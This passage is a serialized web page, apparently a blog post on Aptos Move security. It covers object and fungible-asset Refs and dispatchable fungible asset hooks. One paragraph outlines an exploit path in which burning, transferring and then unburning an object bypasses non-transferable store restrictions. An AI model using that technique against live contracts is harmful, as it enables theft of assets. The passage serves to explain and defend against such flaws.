LinearTransferRef",{"type":24,"tag":301,"props":71645,"children":71646},{"style":359},[71647],{"type":30,"value":377},{"type":24,"tag":301,"props":71649,"children":71650},{"style":369},[71651],{"type":30,"value":39478},{"type":24,"tag":301,"props":71653,"children":71654},{"style":385},[71655],{"type":30,"value":1679},{"type":24,"tag":301,"props":71657,"children":71658},{"style":369},[71659],{"type":30,"value":13069},{"type":24,"tag":301,"props":71661,"children":71662},{"style":359},[71663],{"type":30,"value":911},{"type":24,"tag":301,"props":71665,"children":71666},{"style":369},[71667],{"type":30,"value":13163},{"type":24,"tag":301,"props":71669,"children":71670},{"style":10246},[71671],{"type":30,"value":70686},{"type":24,"tag":301,"props":71673,"children":71674},{"style":359},[71675],{"type":30,"value":3035},{"type":24,"tag":301,"props":71677,"children":71678},{"class":303,"line":320},[71679,71683,71687,71691,71695,71699,71704,71708,71712,71716,71720,71724,71728,71732],{"type":24,"tag":301,"props":71680,"children":71681},{"style":314},[71682],{"type":30,"value":69056},{"type":24,"tag":301,"props":71684,"children":71685},{"style":359},[71686],{"type":30,"value":362},{"type":24,"tag":301,"props":71688,"children":71689},{"style":385},[71690],{"type":30,"value":2485},{"type":24,"tag":301,"props":71692,"children":71693},{"style":369},[71694],{"type":30,"value":13523},{"type":24,"tag":301,"props":71696,"children":71697},{"style":359},[71698],{"type":30,"value":1849},{"type":24,"tag":301,"props":71700,"children":71701},{"style":10246},[71702],{"type":30,"value":71703},"Untransferable",{"type":24,"tag":301,"props":71705,"children":71706},{"style":359},[71707],{"type":30,"value":14426},{"type":24,"tag":301,"props":71709,"children":71710},{"style":348},[71711],{"type":30,"value":70049},{"type":24,"tag":301,"props":71713,"children":71714},{"style":385},[71715],{"type":30,"value":206},{"type":24,"tag":301,"props":71717,"children":71718},{"style":348},[71719],{"type":30,"value":20507},{"type":24,"tag":301,"props":71721,"children":71722},{"style":359},[71723],{"type":30,"value":69645},{"type":24,"tag":301,"props":71725,"children":71726},{"style":385},[71727],{"type":30,"value":10308},{"type":24,"tag":301,"props":71729,"children":71730},{"style":314},[71731],{"type":30,"value":70531},{"type":24,"tag":301,"props":71733,"children":71734},{"style":359},[71735],{"type":30,"value":71736},"(ENOT_MOVABLE));\n",{"type":24,"tag":301,"props":71738,"children":71739},{"class":303,"line":335},[71740,71744,71748,71752,71756,71760,71764,71768,71772,71776,71780],{"type":24,"tag":301,"props":71741,"children":71742},{"style":348},[71743],{"type":30,"value":9838},{"type":24,"tag":301,"props":71745,"children":71746},{"style":369},[71747],{"type":30,"value":69206},{"type":24,"tag":301,"props":71749,"children":71750},{"style":385},[71751],{"type":30,"value":2537},{"type":24,"tag":301,"props":71753,"children":71754},{"style":369},[71755],{"type":30,"value":14412},{"type":24,"tag":301,"props":71757,"children":71758},{"style":359},[71759],{"type":30,"value":1849},{"type":24,"tag":301,"props":71761,"children":71762},{"style":10246},[71763],{"type":30,"value":71180},{"type":24,"tag":301,"props":71765,"children":71766},{"style":359},[71767],{"type":30,"value":14426},{"type":24,"tag":301,"props":71769,"children":71770},{"style":348},[71771],{"type":30,"value":70049},{"type":24,"tag":301,"props":71773,"children":71774},{"style":385},[71775],{"type":30,"value":206},{"type":24,"tag":301,"props":71777,"children":71778},{"style":348},[71779],{"type":30,"value":20507},{"type":24,"tag":301,"props":71781,"children":71782},{"style":359},[71783],{"type":30,"value":589},{"type":24,"tag":301,"props":71785,"children":71786},{"class":303,"line":344},[71787,71791],{"type":24,"tag":301,"props":71788,"children":71789},{"style":314},[71790],{"type":30,"value":69056},{"type":24,"tag":301,"props":71792,"children":71793},{"style":359},[71794],{"type":30,"value":1707},{"type":24,"tag":301,"props":71796,"children":71797},{"class":303,"line":401},[71798,71803,71807,71812,71816,71821,71825],{"type":24,"tag":301,"props":71799,"children":71800},{"style":369},[71801],{"type":30,"value":71802}," object",{"type":24,"tag":301,"props":71804,"children":71805},{"style":385},[71806],{"type":30,"value":206},{"type":24,"tag":301,"props":71808,"children":71809},{"style":359},[71810],{"type":30,"value":71811},"owner ",{"type":24,"tag":301,"props":71813,"children":71814},{"style":385},[71815],{"type":30,"value":607},{"type":24,"tag":301,"props":71817,"children":71818},{"style":348},[71819],{"type":30,"value":71820}," ref",{"type":24,"tag":301,"props":71822,"children":71823},{"style":385},[71824],{"type":30,"value":206},{"type":24,"tag":301,"props":71826,"children":71827},{"style":359},[71828],{"type":30,"value":71829},"owner,\n",{"type":24,"tag":301,"props":71831,"children":71832},{"class":303,"line":415},[71833,71838,71842,71846],{"type":24,"tag":301,"props":71834,"children":71835},{"style":359},[71836],{"type":30,"value":71837}," error",{"type":24,"tag":301,"props":71839,"children":71840},{"style":385},[71841],{"type":30,"value":10308},{"type":24,"tag":301,"props":71843,"children":71844},{"style":314},[71845],{"type":30,"value":70531},{"type":24,"tag":301,"props":71847,"children":71848},{"style":359},[71849],{"type":30,"value":71214},{"type":24,"tag":301,"props":71851,"children":71852},{"class":303,"line":439},[71853],{"type":24,"tag":301,"props":71854,"children":71855},{"style":359},[71856],{"type":30,"value":3788},{"type":24,"tag":301,"props":71858,"children":71859},{"class":303,"line":447},[71860],{"type":24,"tag":301,"props":71861,"children":71862},{"style":359},[71863],{"type":30,"value":649},{"type":24,"tag":301,"props":71865,"children":71866},{"class":303,"line":476},[71867,71871,71875],{"type":24,"tag":301,"props":71868,"children":71869},{"style":359},[71870],{"type":30,"value":69430},{"type":24,"tag":301,"props":71872,"children":71873},{"style":385},[71874],{"type":30,"value":4054},{"type":24,"tag":301,"props":71876,"children":71877},{"style":359},[71878],{"type":30,"value":4059},{"type":24,"tag":301,"props":71880,"children":71881},{"class":303,"line":495},[71882],{"type":24,"tag":301,"props":71883,"children":71884},{"style":359},[71885],{"type":30,"value":649},{"type":24,"tag":301,"props":71887,"children":71888},{"class":303,"line":504},[71889,71893,71897,71901,71905,71910],{"type":24,"tag":301,"props":71890,"children":71891},{"style":369},[71892],{"type":30,"value":71537},{"type":24,"tag":301,"props":71894,"children":71895},{"style":385},[71896],{"type":30,"value":206},{"type":24,"tag":301,"props":71898,"children":71899},{"style":359},[71900],{"type":30,"value":71811},{"type":24,"tag":301,"props":71902,"children":71903},{"style":385},[71904],{"type":30,"value":523},{"type":24,"tag":301,"props":71906,"children":71907},{"style":369},[71908],{"type":30,"value":71909}," to",{"type":24,"tag":301,"props":71911,"children":71912},{"style":359},[71913],{"type":30,"value":492},{"type":24,"tag":301,"props":71915,"children":71916},{"class":303,"line":512},[71917],{"type":24,"tag":301,"props":71918,"children":71919},{"style":359},[71920],{"type":30,"value":698},{"type":24,"tag":32,"props":71922,"children":71923},{},[71924,71926,71931,71933,71938],{"type":30,"value":71925},"A user could exploit this by creating an object and a transfer permission, burning the object (changing its ownership to the ",{"type":24,"tag":145,"props":71927,"children":71929},{"className":71928},[],[71930],{"type":30,"value":70584},{"type":30,"value":71932},"), transferring it to another user, and then registering a non-transferable fungible store with that object. While the store could no longer be moved using the owner's ",{"type":24,"tag":145,"props":71934,"children":71936},{"className":71935},[],[71937],{"type":30,"value":13963},{"type":30,"value":71939}," or the transfer permission due to non-transferable restrictions, it could be unburned to restore the original ownership!",{"type":24,"tag":80,"props":71941,"children":71943},{"id":71942},"references",[71944],{"type":30,"value":71945},"References",{"type":24,"tag":32,"props":71947,"children":71948},{},[71949,71954,71956,71962,71964,71969,71971,71976],{"type":24,"tag":145,"props":71950,"children":71952},{"className":71951},[],[71953],{"type":30,"value":71945},{"type":30,"value":71955}," are a permission type resource that authenticate a caller for security-critical operations. ",{"type":24,"tag":145,"props":71957,"children":71959},{"className":71958},[],[71960],{"type":30,"value":71961},"Refs",{"type":30,"value":71963}," are based on the ",{"type":24,"tag":145,"props":71965,"children":71967},{"className":71966},[],[71968],{"type":30,"value":55585},{"type":30,"value":71970}," model, but they are also adapted by fungible assets. Some of these are defined by the ",{"type":24,"tag":145,"props":71972,"children":71974},{"className":71973},[],[71975],{"type":30,"value":55585},{"type":30,"value":71977}," itself, while others are created through the fungible asset module. What's more, some are shared between them, while others appear shared but aren’t.",{"type":24,"tag":32,"props":71979,"children":71980},{},[71981,71983,71988,71990,71995,71996,72002,72004,72009,72011,72016],{"type":30,"value":71982},"Let's get back to the ",{"type":24,"tag":145,"props":71984,"children":71986},{"className":71985},[],[71987],{"type":30,"value":68788},{"type":30,"value":71989}," deletion example. Both ",{"type":24,"tag":145,"props":71991,"children":71993},{"className":71992},[],[71994],{"type":30,"value":70073},{"type":30,"value":2378},{"type":24,"tag":145,"props":71997,"children":71999},{"className":71998},[],[72000],{"type":30,"value":72001},"fungible_asset::remove_store",{"type":30,"value":72003}," use the same object-specific ",{"type":24,"tag":145,"props":72005,"children":72007},{"className":72006},[],[72008],{"type":30,"value":70005},{"type":30,"value":72010}," permission. It can be created only during object creation. There is no separate ",{"type":24,"tag":145,"props":72012,"children":72014},{"className":72013},[],[72015],{"type":30,"value":70005},{"type":30,"value":72017}," for fungible assets.",{"type":24,"tag":291,"props":72019,"children":72020},{"className":9818,"code":69955,"language":9817,"meta":7,"style":7},[72021],{"type":24,"tag":145,"props":72022,"children":72023},{"__ignoreMap":7},[72024,72031,72070,72077,72084],{"type":24,"tag":301,"props":72025,"children":72026},{"class":303,"line":304},[72027],{"type":24,"tag":301,"props":72028,"children":72029},{"style":1062},[72030],{"type":30,"value":69967},{"type":24,"tag":301,"props":72032,"children":72033},{"class":303,"line":320},[72034,72038,72042,72046,72050,72054,72058,72062,72066],{"type":24,"tag":301,"props":72035,"children":72036},{"style":369},[72037],{"type":30,"value":68388},{"type":24,"tag":301,"props":72039,"children":72040},{"style":369},[72041],{"type":30,"value":13026},{"type":24,"tag":301,"props":72043,"children":72044},{"style":314},[72045],{"type":30,"value":69983},{"type":24,"tag":301,"props":72047,"children":72048},{"style":359},[72049],{"type":30,"value":362},{"type":24,"tag":301,"props":72051,"children":72052},{"style":369},[72053],{"type":30,"value":69992},{"type":24,"tag":301,"props":72055,"children":72056},{"style":385},[72057],{"type":30,"value":1679},{"type":24,"tag":301,"props":72059,"children":72060},{"style":385},[72061],{"type":30,"value":991},{"type":24,"tag":301,"props":72063,"children":72064},{"style":10246},[72065],{"type":30,"value":70005},{"type":24,"tag":301,"props":72067,"children":72068},{"style":359},[72069],{"type":30,"value":791},{"type":24,"tag":301,"props":72071,"children":72072},{"class":303,"line":335},[72073],{"type":24,"tag":301,"props":72074,"children":72075},{"emptyLinePlaceholder":16},[72076],{"type":30,"value":341},{"type":24,"tag":301,"props":72078,"children":72079},{"class":303,"line":344},[72080],{"type":24,"tag":301,"props":72081,"children":72082},{"style":1062},[72083],{"type":30,"value":70024},{"type":24,"tag":301,"props":72085,"children":72086},{"class":303,"line":401},[72087,72091,72095,72099,72103,72107,72111,72115],{"type":24,"tag":301,"props":72088,"children":72089},{"style":369},[72090],{"type":30,"value":68388},{"type":24,"tag":301,"props":72092,"children":72093},{"style":369},[72094],{"type":30,"value":13026},{"type":24,"tag":301,"props":72096,"children":72097},{"style":314},[72098],{"type":30,"value":70040},{"type":24,"tag":301,"props":72100,"children":72101},{"style":359},[72102],{"type":30,"value":362},{"type":24,"tag":301,"props":72104,"children":72105},{"style":348},[72106],{"type":30,"value":70049},{"type":24,"tag":301,"props":72108,"children":72109},{"style":385},[72110],{"type":30,"value":1679},{"type":24,"tag":301,"props":72112,"children":72113},{"style":10246},[72114],{"type":30,"value":70058},{"type":24,"tag":301,"props":72116,"children":72117},{"style":359},[72118],{"type":30,"value":791},{"type":24,"tag":32,"props":72120,"children":72121},{},[72122,72124,72129,72131,72137],{"type":30,"value":72123},"On the other hand, the \"frozen\" status of a ",{"type":24,"tag":145,"props":72125,"children":72127},{"className":72126},[],[72128],{"type":30,"value":68788},{"type":30,"value":72130}," is toggled using a ",{"type":24,"tag":145,"props":72132,"children":72134},{"className":72133},[],[72135],{"type":30,"value":72136},"TransferRef",{"type":30,"value":72138},", which is defined in both models (and not interchangeable). They also can be created only during object creation.",{"type":24,"tag":291,"props":72140,"children":72142},{"className":9818,"code":72141,"language":9817,"meta":7,"style":7},"public fun set_frozen_flag\u003CT: key>(\n ref: &TransferRef,\n store: Object\u003CT>,\n frozen: bool,\n)\n",[72143],{"type":24,"tag":145,"props":72144,"children":72145},{"__ignoreMap":7},[72146,72182,72206,72233,72252],{"type":24,"tag":301,"props":72147,"children":72148},{"class":303,"line":304},[72149,72153,72157,72162,72166,72170,72174,72178],{"type":24,"tag":301,"props":72150,"children":72151},{"style":369},[72152],{"type":30,"value":68388},{"type":24,"tag":301,"props":72154,"children":72155},{"style":369},[72156],{"type":30,"value":13026},{"type":24,"tag":301,"props":72158,"children":72159},{"style":369},[72160],{"type":30,"value":72161}," set_frozen_flag",{"type":24,"tag":301,"props":72163,"children":72164},{"style":359},[72165],{"type":30,"value":1849},{"type":24,"tag":301,"props":72167,"children":72168},{"style":10246},[72169],{"type":30,"value":12807},{"type":24,"tag":301,"props":72171,"children":72172},{"style":385},[72173],{"type":30,"value":1679},{"type":24,"tag":301,"props":72175,"children":72176},{"style":369},[72177],{"type":30,"value":12751},{"type":24,"tag":301,"props":72179,"children":72180},{"style":359},[72181],{"type":30,"value":13407},{"type":24,"tag":301,"props":72183,"children":72184},{"class":303,"line":320},[72185,72190,72194,72198,72202],{"type":24,"tag":301,"props":72186,"children":72187},{"style":348},[72188],{"type":30,"value":72189}," ref",{"type":24,"tag":301,"props":72191,"children":72192},{"style":385},[72193],{"type":30,"value":1679},{"type":24,"tag":301,"props":72195,"children":72196},{"style":385},[72197],{"type":30,"value":991},{"type":24,"tag":301,"props":72199,"children":72200},{"style":10246},[72201],{"type":30,"value":72136},{"type":24,"tag":301,"props":72203,"children":72204},{"style":359},[72205],{"type":30,"value":1729},{"type":24,"tag":301,"props":72207,"children":72208},{"class":303,"line":335},[72209,72213,72217,72221,72225,72229],{"type":24,"tag":301,"props":72210,"children":72211},{"style":369},[72212],{"type":30,"value":36170},{"type":24,"tag":301,"props":72214,"children":72215},{"style":385},[72216],{"type":30,"value":1679},{"type":24,"tag":301,"props":72218,"children":72219},{"style":10246},[72220],{"type":30,"value":68274},{"type":24,"tag":301,"props":72222,"children":72223},{"style":359},[72224],{"type":30,"value":1849},{"type":24,"tag":301,"props":72226,"children":72227},{"style":10246},[72228],{"type":30,"value":12807},{"type":24,"tag":301,"props":72230,"children":72231},{"style":359},[72232],{"type":30,"value":12957},{"type":24,"tag":301,"props":72234,"children":72235},{"class":303,"line":344},[72236,72240,72244,72248],{"type":24,"tag":301,"props":72237,"children":72238},{"style":369},[72239],{"type":30,"value":67926},{"type":24,"tag":301,"props":72241,"children":72242},{"style":385},[72243],{"type":30,"value":1679},{"type":24,"tag":301,"props":72245,"children":72246},{"style":10246},[72247],{"type":30,"value":18848},{"type":24,"tag":301,"props":72249,"children":72250},{"style":359},[72251],{"type":30,"value":1729},{"type":24,"tag":301,"props":72253,"children":72254},{"class":303,"line":401},[72255],{"type":24,"tag":301,"props":72256,"children":72257},{"style":359},[72258],{"type":30,"value":791},{"type":24,"tag":32,"props":72260,"children":72261},{},[72262,72263,72268,72269,72274],{"type":30,"value":8079},{"type":24,"tag":145,"props":72264,"children":72266},{"className":72265},[],[72267],{"type":30,"value":55585},{"type":30,"value":13277},{"type":24,"tag":145,"props":72270,"children":72272},{"className":72271},[],[72273],{"type":30,"value":72136},{"type":30,"value":72275}," is used to transfer object ownership:",{"type":24,"tag":291,"props":72277,"children":72279},{"className":9818,"code":72278,"language":9817,"meta":7,"style":7},"/// Used to create LinearTransferRef, hence ownership transfer.\nstruct TransferRef has drop, store {\n self: address,\n}\n",[72280],{"type":24,"tag":145,"props":72281,"children":72282},{"__ignoreMap":7},[72283,72291,72324,72343],{"type":24,"tag":301,"props":72284,"children":72285},{"class":303,"line":304},[72286],{"type":24,"tag":301,"props":72287,"children":72288},{"style":1062},[72289],{"type":30,"value":72290},"/// Used to create LinearTransferRef, hence ownership transfer.\n",{"type":24,"tag":301,"props":72292,"children":72293},{"class":303,"line":320},[72294,72298,72303,72307,72312,72316,72320],{"type":24,"tag":301,"props":72295,"children":72296},{"style":348},[72297],{"type":30,"value":3010},{"type":24,"tag":301,"props":72299,"children":72300},{"style":10246},[72301],{"type":30,"value":72302}," TransferRef",{"type":24,"tag":301,"props":72304,"children":72305},{"style":369},[72306],{"type":30,"value":16216},{"type":24,"tag":301,"props":72308,"children":72309},{"style":369},[72310],{"type":30,"value":72311}," drop",{"type":24,"tag":301,"props":72313,"children":72314},{"style":359},[72315],{"type":30,"value":377},{"type":24,"tag":301,"props":72317,"children":72318},{"style":369},[72319],{"type":30,"value":12760},{"type":24,"tag":301,"props":72321,"children":72322},{"style":359},[72323],{"type":30,"value":3035},{"type":24,"tag":301,"props":72325,"children":72326},{"class":303,"line":335},[72327,72331,72335,72339],{"type":24,"tag":301,"props":72328,"children":72329},{"style":348},[72330],{"type":30,"value":27555},{"type":24,"tag":301,"props":72332,"children":72333},{"style":385},[72334],{"type":30,"value":1679},{"type":24,"tag":301,"props":72336,"children":72337},{"style":369},[72338],{"type":30,"value":13069},{"type":24,"tag":301,"props":72340,"children":72341},{"style":359},[72342],{"type":30,"value":1729},{"type":24,"tag":301,"props":72344,"children":72345},{"class":303,"line":344},[72346],{"type":24,"tag":301,"props":72347,"children":72348},{"style":359},[72349],{"type":30,"value":698},{"type":24,"tag":32,"props":72351,"children":72352},{},[72353,72355,72360],{"type":30,"value":72354},"While the fungible asset's ",{"type":24,"tag":145,"props":72356,"children":72358},{"className":72357},[],[72359],{"type":30,"value":72136},{"type":30,"value":72361}," manages the transfer of fungible assets and the (un)freezing of fungible stores:",{"type":24,"tag":291,"props":72363,"children":72365},{"className":9818,"code":72364,"language":9817,"meta":7,"style":7},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n/// and allow the holder of TransferRef to transfer fungible assets from any account.\nstruct TransferRef has drop, store {\n metadata: Object\u003CMetadata>\n}\n",[72366],{"type":24,"tag":145,"props":72367,"children":72368},{"__ignoreMap":7},[72369,72377,72385,72416,72443],{"type":24,"tag":301,"props":72370,"children":72371},{"class":303,"line":304},[72372],{"type":24,"tag":301,"props":72373,"children":72374},{"style":1062},[72375],{"type":30,"value":72376},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n",{"type":24,"tag":301,"props":72378,"children":72379},{"class":303,"line":320},[72380],{"type":24,"tag":301,"props":72381,"children":72382},{"style":1062},[72383],{"type":30,"value":72384},"/// and allow the holder of TransferRef to transfer fungible assets from any account.\n",{"type":24,"tag":301,"props":72386,"children":72387},{"class":303,"line":335},[72388,72392,72396,72400,72404,72408,72412],{"type":24,"tag":301,"props":72389,"children":72390},{"style":348},[72391],{"type":30,"value":3010},{"type":24,"tag":301,"props":72393,"children":72394},{"style":10246},[72395],{"type":30,"value":72302},{"type":24,"tag":301,"props":72397,"children":72398},{"style":369},[72399],{"type":30,"value":16216},{"type":24,"tag":301,"props":72401,"children":72402},{"style":369},[72403],{"type":30,"value":72311},{"type":24,"tag":301,"props":72405,"children":72406},{"style":359},[72407],{"type":30,"value":377},{"type":24,"tag":301,"props":72409,"children":72410},{"style":369},[72411],{"type":30,"value":12760},{"type":24,"tag":301,"props":72413,"children":72414},{"style":359},[72415],{"type":30,"value":3035},{"type":24,"tag":301,"props":72417,"children":72418},{"class":303,"line":344},[72419,72423,72427,72431,72435,72439],{"type":24,"tag":301,"props":72420,"children":72421},{"style":369},[72422],{"type":30,"value":68265},{"type":24,"tag":301,"props":72424,"children":72425},{"style":385},[72426],{"type":30,"value":1679},{"type":24,"tag":301,"props":72428,"children":72429},{"style":10246},[72430],{"type":30,"value":68274},{"type":24,"tag":301,"props":72432,"children":72433},{"style":359},[72434],{"type":30,"value":1849},{"type":24,"tag":301,"props":72436,"children":72437},{"style":10246},[72438],{"type":30,"value":68283},{"type":24,"tag":301,"props":72440,"children":72441},{"style":359},[72442],{"type":30,"value":12812},{"type":24,"tag":301,"props":72444,"children":72445},{"class":303,"line":401},[72446],{"type":24,"tag":301,"props":72447,"children":72448},{"style":359},[72449],{"type":30,"value":698},{"type":24,"tag":32,"props":72451,"children":72452},{},[72453,72455,72461,72463,72469],{"type":30,"value":72454},"Additionally, there are fungible asset-specific references such as ",{"type":24,"tag":145,"props":72456,"children":72458},{"className":72457},[],[72459],{"type":30,"value":72460},"MintRef",{"type":30,"value":72462}," for minting and ",{"type":24,"tag":145,"props":72464,"children":72466},{"className":72465},[],[72467],{"type":30,"value":72468},"BurnRef",{"type":30,"value":72470}," for burning. These references are used exclusively by the fungible asset model, but they still must be created when the fungible asset object is initialized.",{"type":24,"tag":43,"props":72472,"children":72474},{"id":72473},"dispatchable-fungible-assets",[72475],{"type":30,"value":72476},"Dispatchable fungible assets",{"type":24,"tag":32,"props":72478,"children":72479},{},[72480],{"type":30,"value":72481},"Dispatchable fungible assets enhance the functionality of fungible assets by enabling the overloading of operations like deposits and withdrawals.",{"type":24,"tag":32,"props":72483,"children":72484},{},[72485],{"type":30,"value":72486},"Hooks registered during the creation of a dispatchable fungible asset override the default logic for these operations, allowing for custom features like access control, fee mechanisms, or granular pausing.",{"type":24,"tag":72488,"props":72489,"children":72490},"warning",{},[72491],{"type":24,"tag":32,"props":72492,"children":72493},{},[72494,72496,72502],{"type":30,"value":72495},"Overloading the core fungible asset functions introduces potential security risks; for example, during a deposit, funds may not end up at the intended address. The dispatchable fungible asset API provides functions like ",{"type":24,"tag":145,"props":72497,"children":72499},{"className":72498},[],[72500],{"type":30,"value":72501},"transfer_assert_minimum_deposit",{"type":30,"value":72503}," that can help mitigate such risks.",{"type":24,"tag":32,"props":72505,"children":72506},{},[72507,72509,72514,72516,72523],{"type":30,"value":72508},"Hook functions for dispatchable fungible assets must have the correct type signature. They must also be declared ",{"type":24,"tag":145,"props":72510,"children":72512},{"className":72511},[],[72513],{"type":30,"value":68388},{"type":30,"value":72515}," to ensure ",{"type":24,"tag":188,"props":72517,"children":72520},{"href":72518,"rel":72519},"https://aptos.dev/en/build/smart-contracts/book/package-upgrades#compatibility-rules",[192],[72521],{"type":30,"value":72522},"their signature remains immutable",{"type":30,"value":72524},". An example implementation might look like this:",{"type":24,"tag":291,"props":72526,"children":72528},{"className":9818,"code":72527,"language":9817,"meta":7,"style":7},"public fun withdraw_hook\u003CT: key>(\n store: Object\u003CT>,\n amount: u64,\n transfer_ref: &TransferRef,\n): FungibleAsset {\n //check paused, gather fees etc.\n fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n\npublic fun deposit_hook\u003CT: key>(\n store: Object\u003CT>,\n fa: FungibleAsset,\n transfer_ref: &TransferRef,\n) {\n //check paused, gather fees etc.\n fungible_asset::deposit_with_ref(transfer_ref, store, fa);\n}\n",[72529],{"type":24,"tag":145,"props":72530,"children":72531},{"__ignoreMap":7},[72532,72568,72595,72614,72638,72657,72665,72711,72718,72725,72761,72788,72808,72831,72838,72845,72889],{"type":24,"tag":301,"props":72533,"children":72534},{"class":303,"line":304},[72535,72539,72543,72548,72552,72556,72560,72564],{"type":24,"tag":301,"props":72536,"children":72537},{"style":369},[72538],{"type":30,"value":68388},{"type":24,"tag":301,"props":72540,"children":72541},{"style":369},[72542],{"type":30,"value":13026},{"type":24,"tag":301,"props":72544,"children":72545},{"style":369},[72546],{"type":30,"value":72547}," withdraw_hook",{"type":24,"tag":301,"props":72549,"children":72550},{"style":359},[72551],{"type":30,"value":1849},{"type":24,"tag":301,"props":72553,"children":72554},{"style":10246},[72555],{"type":30,"value":12807},{"type":24,"tag":301,"props":72557,"children":72558},{"style":385},[72559],{"type":30,"value":1679},{"type":24,"tag":301,"props":72561,"children":72562},{"style":369},[72563],{"type":30,"value":12751},{"type":24,"tag":301,"props":72565,"children":72566},{"style":359},[72567],{"type":30,"value":13407},{"type":24,"tag":301,"props":72569,"children":72570},{"class":303,"line":320},[72571,72575,72579,72583,72587,72591],{"type":24,"tag":301,"props":72572,"children":72573},{"style":369},[72574],{"type":30,"value":36170},{"type":24,"tag":301,"props":72576,"children":72577},{"style":385},[72578],{"type":30,"value":1679},{"type":24,"tag":301,"props":72580,"children":72581},{"style":10246},[72582],{"type":30,"value":68274},{"type":24,"tag":301,"props":72584,"children":72585},{"style":359},[72586],{"type":30,"value":1849},{"type":24,"tag":301,"props":72588,"children":72589},{"style":10246},[72590],{"type":30,"value":12807},{"type":24,"tag":301,"props":72592,"children":72593},{"style":359},[72594],{"type":30,"value":12957},{"type":24,"tag":301,"props":72596,"children":72597},{"class":303,"line":335},[72598,72602,72606,72610],{"type":24,"tag":301,"props":72599,"children":72600},{"style":369},[72601],{"type":30,"value":68295},{"type":24,"tag":301,"props":72603,"children":72604},{"style":385},[72605],{"type":30,"value":1679},{"type":24,"tag":301,"props":72607,"children":72608},{"style":10246},[72609],{"type":30,"value":12680},{"type":24,"tag":301,"props":72611,"children":72612},{"style":359},[72613],{"type":30,"value":1729},{"type":24,"tag":301,"props":72615,"children":72616},{"class":303,"line":344},[72617,72622,72626,72630,72634],{"type":24,"tag":301,"props":72618,"children":72619},{"style":369},[72620],{"type":30,"value":72621}," transfer_ref",{"type":24,"tag":301,"props":72623,"children":72624},{"style":385},[72625],{"type":30,"value":1679},{"type":24,"tag":301,"props":72627,"children":72628},{"style":385},[72629],{"type":30,"value":991},{"type":24,"tag":301,"props":72631,"children":72632},{"style":10246},[72633],{"type":30,"value":72136},{"type":24,"tag":301,"props":72635,"children":72636},{"style":359},[72637],{"type":30,"value":1729},{"type":24,"tag":301,"props":72639,"children":72640},{"class":303,"line":401},[72641,72645,72649,72653],{"type":24,"tag":301,"props":72642,"children":72643},{"style":359},[72644],{"type":30,"value":9961},{"type":24,"tag":301,"props":72646,"children":72647},{"style":385},[72648],{"type":30,"value":1679},{"type":24,"tag":301,"props":72650,"children":72651},{"style":10246},[72652],{"type":30,"value":68253},{"type":24,"tag":301,"props":72654,"children":72655},{"style":359},[72656],{"type":30,"value":3035},{"type":24,"tag":301,"props":72658,"children":72659},{"class":303,"line":415},[72660],{"type":24,"tag":301,"props":72661,"children":72662},{"style":1062},[72663],{"type":30,"value":72664}," //check paused, gather fees etc.\n",{"type":24,"tag":301,"props":72666,"children":72667},{"class":303,"line":439},[72668,72673,72677,72682,72686,72691,72695,72699,72703,72707],{"type":24,"tag":301,"props":72669,"children":72670},{"style":359},[72671],{"type":30,"value":72672}," fungible_asset",{"type":24,"tag":301,"props":72674,"children":72675},{"style":385},[72676],{"type":30,"value":10308},{"type":24,"tag":301,"props":72678,"children":72679},{"style":314},[72680],{"type":30,"value":72681},"withdraw_with_ref",{"type":24,"tag":301,"props":72683,"children":72684},{"style":359},[72685],{"type":30,"value":362},{"type":24,"tag":301,"props":72687,"children":72688},{"style":369},[72689],{"type":30,"value":72690},"transfer_ref",{"type":24,"tag":301,"props":72692,"children":72693},{"style":359},[72694],{"type":30,"value":377},{"type":24,"tag":301,"props":72696,"children":72697},{"style":369},[72698],{"type":30,"value":12760},{"type":24,"tag":301,"props":72700,"children":72701},{"style":359},[72702],{"type":30,"value":377},{"type":24,"tag":301,"props":72704,"children":72705},{"style":369},[72706],{"type":30,"value":27077},{"type":24,"tag":301,"props":72708,"children":72709},{"style":359},[72710],{"type":30,"value":791},{"type":24,"tag":301,"props":72712,"children":72713},{"class":303,"line":447},[72714],{"type":24,"tag":301,"props":72715,"children":72716},{"style":359},[72717],{"type":30,"value":698},{"type":24,"tag":301,"props":72719,"children":72720},{"class":303,"line":476},[72721],{"type":24,"tag":301,"props":72722,"children":72723},{"emptyLinePlaceholder":16},[72724],{"type":30,"value":341},{"type":24,"tag":301,"props":72726,"children":72727},{"class":303,"line":495},[72728,72732,72736,72741,72745,72749,72753,72757],{"type":24,"tag":301,"props":72729,"children":72730},{"style":369},[72731],{"type":30,"value":68388},{"type":24,"tag":301,"props":72733,"children":72734},{"style":369},[72735],{"type":30,"value":13026},{"type":24,"tag":301,"props":72737,"children":72738},{"style":369},[72739],{"type":30,"value":72740}," deposit_hook",{"type":24,"tag":301,"props":72742,"children":72743},{"style":359},[72744],{"type":30,"value":1849},{"type":24,"tag":301,"props":72746,"children":72747},{"style":10246},[72748],{"type":30,"value":12807},{"type":24,"tag":301,"props":72750,"children":72751},{"style":385},[72752],{"type":30,"value":1679},{"type":24,"tag":301,"props":72754,"children":72755},{"style":369},[72756],{"type":30,"value":12751},{"type":24,"tag":301,"props":72758,"children":72759},{"style":359},[72760],{"type":30,"value":13407},{"type":24,"tag":301,"props":72762,"children":72763},{"class":303,"line":504},[72764,72768,72772,72776,72780,72784],{"type":24,"tag":301,"props":72765,"children":72766},{"style":369},[72767],{"type":30,"value":36170},{"type":24,"tag":301,"props":72769,"children":72770},{"style":385},[72771],{"type":30,"value":1679},{"type":24,"tag":301,"props":72773,"children":72774},{"style":10246},[72775],{"type":30,"value":68274},{"type":24,"tag":301,"props":72777,"children":72778},{"style":359},[72779],{"type":30,"value":1849},{"type":24,"tag":301,"props":72781,"children":72782},{"style":10246},[72783],{"type":30,"value":12807},{"type":24,"tag":301,"props":72785,"children":72786},{"style":359},[72787],{"type":30,"value":12957},{"type":24,"tag":301,"props":72789,"children":72790},{"class":303,"line":512},[72791,72796,72800,72804],{"type":24,"tag":301,"props":72792,"children":72793},{"style":369},[72794],{"type":30,"value":72795}," 